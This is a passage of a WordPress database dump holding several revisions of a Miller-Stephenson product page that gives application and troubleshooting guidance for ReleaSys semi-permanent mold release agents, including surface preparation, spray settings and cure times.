class="fancy-underline">Cause</span></span></td>\r\n<td style="text-align: justify;" width="680"><span style="font-size: 120%;">                                              <span class="fancy-underline">Solution</span></span></td>\r\n</tr>\r\n<tr>\r\n<td rowspan="3">Complete failure to obtain release</td>\r\n<td>• Improperly cured ReleaSys Film</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td>• Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td>• Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Poor Release in strained molding areas</td>\r\n<td>• Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td>• Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td width="241">Good release but build-up of ReleaSys on mold surface.</td>\r\n<td>• Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td rowspan="2" width="241">Good release but parts exhibit  blemishes or oily patches</td>\r\n<td>• Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td>• Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td rowspan="3">Inability to achieve multiple releases.</td>\r\n<td>• Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td>• Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td>• Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td width="241">Poor release accompanied by small particles of molding material left on mold surface.</td>\r\n<td>• Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n</div>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 13:42:51', '2016-10-24 13:42:51', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2709, 3, '2016-10-24 13:44:58', '2016-10-24 13:44:58', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and commonly observed issues to help aid our customers in applying ReleaSys.</p>\r\n<p style="text-align: justify;"><span style="font-size: 140%;"><strong>Mold Release Application Guide:\r\n</strong></span></p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span></p>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Application to Mold Surface</span></p>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol style="text-align: justify;">\r\n 	<li>Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzles sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li>When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.</li>\r\n 	<li><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Re-application</span></p>\r\n\r\n<ol style="text-align: justify;">\r\n 	<li>When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li>When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\n<p style="text-align: justify;"><strong>Troubleshooting Guide</strong></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td width="241"><span style="font-size: 120%;">           <span class="fancy-underline">Problem</span></span></td>\r\n<td style="text-align: justify;" width="517"><span style="font-size: 120%;">                                  <span class="fancy-underline">Cause</span></span></td>\r\n<td style="text-align: justify;" width="680"><span style="font-size: 120%;">                                              <span class="fancy-underline">Solution</span></span></td>\r\n</tr>\r\n<tr>\r\n<td rowspan="3">Complete failure to obtain release</td>\r\n<td>›Improperly cured ReleaSys Film</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td>›Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td>›Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Poor Release in strained molding areas</td>\r\n<td>›Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td>›Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td width="241">Good release but build-up of ReleaSys on mold surface.</td>\r\n<td>›Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td rowspan="2" width="241">Good release but parts exhibit  blemishes or oily patches</td>\r\n<td>›Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td>›Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td rowspan="3">Inability to achieve multiple releases.</td>\r\n<td>›Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td>›Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td>›Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td width="241">Poor release accompanied by small particles of molding material left on mold surface.</td>\r\n<td>•Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n</div>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 13:44:58', '2016-10-24 13:44:58', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2710, 3, '2016-10-24 13:48:20', '2016-10-24 13:48:20', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and commonly observed issues to help aid our customers in applying ReleaSys.</p>\r\n<p style="text-align: justify;"><span style="font-size: 140%;"><strong>Mold Release Application Guide:\r\n</strong></span></p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span></p>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Application to Mold Surface</span></p>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol style="text-align: justify;">\r\n 	<li>Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzles sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li>When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.</li>\r\n 	<li><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Re-application</span></p>\r\n\r\n<ol style="text-align: justify;">\r\n 	<li>When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li>When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\n<p style="text-align: justify;"><strong>Troubleshooting Guide</strong></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td width="241"><span style="font-size: 120%;">       </span>   <span style="color: #808080;"> <span style="font-size: 120%;" data-text-color="primary">Problem</span></span></td>\r\n<td style="text-align: justify;" width="517"><span style="font-size: 120%;">                                  <span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: justify;" width="680"><span style="font-size: 120%;">                                              <span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td rowspan="3">Complete failure to obtain release</td>\r\n<td>›Improperly cured ReleaSys Film</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td>›Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td>›Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Poor Release in strained molding areas</td>\r\n<td>›Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td>›Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td width="241">Good release but build-up of ReleaSys on mold surface.</td>\r\n<td>›Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td rowspan="2" width="241">Good release but parts exhibit  blemishes or oily patches</td>\r\n<td>›Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td>›Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td rowspan="3">Inability to achieve multiple releases.</td>\r\n<td>›Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td>›Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td>›Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td width="241">Poor release accompanied by small particles of molding material left on mold surface.</td>\r\n<td>•Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n</div>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 13:48:20', '2016-10-24 13:48:20', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2711, 3, '2016-10-24 13:53:17', '2016-10-24 13:53:17', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and commonly observed issues to help aid our customers in applying ReleaSys.</p>\r\n<p style="text-align: justify;"><span style="font-size: 140%;"><strong>Mold Release Application Guide:\r\n</strong></span></p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span></p>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Application to Mold Surface</span></p>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol style="text-align: justify;">\r\n 	<li>Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzles sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li>When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.</li>\r\n 	<li><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Re-application</span></p>\r\n\r\n<ol style="text-align: justify;">\r\n 	<li>When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li>When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\n<p style="text-align: justify;"><strong>Troubleshooting Guide</strong></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td width="241"><span style="font-size: 120%;">       </span>   <span style="color: #808080;"> <span style="font-size: 120%;" data-text-color="primary">Problem</span></span></td>\r\n<td style="text-align: justify;" width="517"><span style="font-size: 120%;">                                  <span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: justify;" width="680"><span style="font-size: 120%;">                                              <span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cure ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release accompanied by small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n</div>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 13:53:17', '2016-10-24 13:53:17', '', 2694, 